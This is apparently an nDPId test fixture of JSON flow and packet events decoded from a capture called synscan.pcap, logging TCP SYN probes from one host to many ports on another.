+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"synscan.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsfsIAADMGlrCsEAAIQA2GNIzTBjrdU4MZAAAAAGACEAAiUgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"synscan.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"synscan.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsa1MAAC8Grh+sEAAIQA2GNIzTPtDdU4MZAAAAAGACEADpuwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"synscan.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"synscan.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsGhYAADsG81ysEAAIQA2GNIzTgArdU4MZAAAAAGACEACogQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":123,"source":"synscan.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4848,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"synscan.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsMvMAAC4G53+sEAAIQA2GNIzTEvDdU4MZAAAAAGACDAAZnAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":124,"source":"synscan.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"synscan.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAspfkAADsGZ3msEAAIQA2GNIzTHmHdU4MZAAAAAGACEAAKKwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":125,"source":"synscan.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":17877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"synscan.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsKRwAACUG+lasEAAIQA2GNIzTRdXdU4MZAAAAAGACCADqtgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":126,"source":"synscan.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3880,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"synscan.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAs13MAADUGO\/+sEAAIQA2GNIzTDyjdU4MZAAAAAGACCAAhZAAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":127,"source":"synscan.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":514,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"synscan.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsN7gAADgG2LqsEAAIQA2GNIzTAgLdU4MZAAAAAGACBAAyigAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":128,"source":"synscan.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14238,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"synscan.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsKvUAACsG8n2sEAAIQA2GNIzTN57dU4MZAAAAAGACEADw7QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":129,"source":"synscan.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":129,"source":"synscan.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAslWEAADoGeRGsEAAIQA2GNIzTB\/bdU4MZAAAAAGACDAAklgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":130,"source":"synscan.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8291,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"synscan.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsazkAADsGojmsEAAIQA2GNIzSIGPdUoMYAAAAAGACEAAILAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":131,"source":"synscan.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3826,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"synscan.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsLfQAADkG4X6sEAAIQA2GNIzSDvLdUoMYAAAAAGACCAAhnQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":132,"source":"synscan.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3077,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"synscan.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAsqFwAAC8GcRasEAAIQA2GNIzSDAXdUoMYAAAAAGACEAAcigAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":133,"source":"synscan.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1187,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"synscan.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAsOg0AACsG42WsEAAIQA2GNIzSBKPdUoMYAAAAAGACEAAj7AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":134,"source":"synscan.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"synscan.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAsF+kAACgGCIqsEAAIQA2GNIzSHCDdUoMYAAAAAGACBAAYbwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"synscan.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5822,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"synscan.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAsKVIAADUG6iCsEAAIQA2GNIzSFr7dUoMYAAAAAGACCAAZ0QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"synscan.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"synscan.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAs8NYAACcGMJysEAAIQA2GNIzSBADdUoMYAAAAAGACEAAkjwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"synscan.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10626,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"synscan.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAsP0EAACcG4jGsEAAIQA2GNIzSKYLdUoMYAAAAAGACEAD\/DAAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":138,"source":"synscan.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"synscan.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAsRFwAADMG0RasEAAIQA2GNIzSACDdUoMYAAAAAGACEAAobwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":139,"source":"synscan.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"synscan.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAsWBgAADIGvlqsEAAIQA2GNIzSOpzdUoMYAAAAAGACDADx8gAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":140,"source":"synscan.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52848,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"synscan.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAscJoAADMGpNisEAAIQA2GNIzSznDdUoMYAAAAAGACEABaHgAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":141,"source":"synscan.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":24,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"synscan.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAs10IAADEGQDCsEAAIQA2GNIzSABjdUoMYAAAAAGACCAAwdwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":142,"source":"synscan.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"synscan.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAs6Q8AADcGKGOsEAAIQA2GNIzSE+3dUoMYAAAAAGACEAAUogAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":143,"source":"synscan.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1296,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"synscan.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAsa+QAADkGo46sEAAIQA2GNIzSBRDdUoMYAAAAAGACCAArfwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"synscan.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"synscan.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAsqBkAAC8GcVmsEAAIQA2GNIzSI47dUoMYAAAAAGACEAAFAQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":145,"source":"synscan.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9917,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 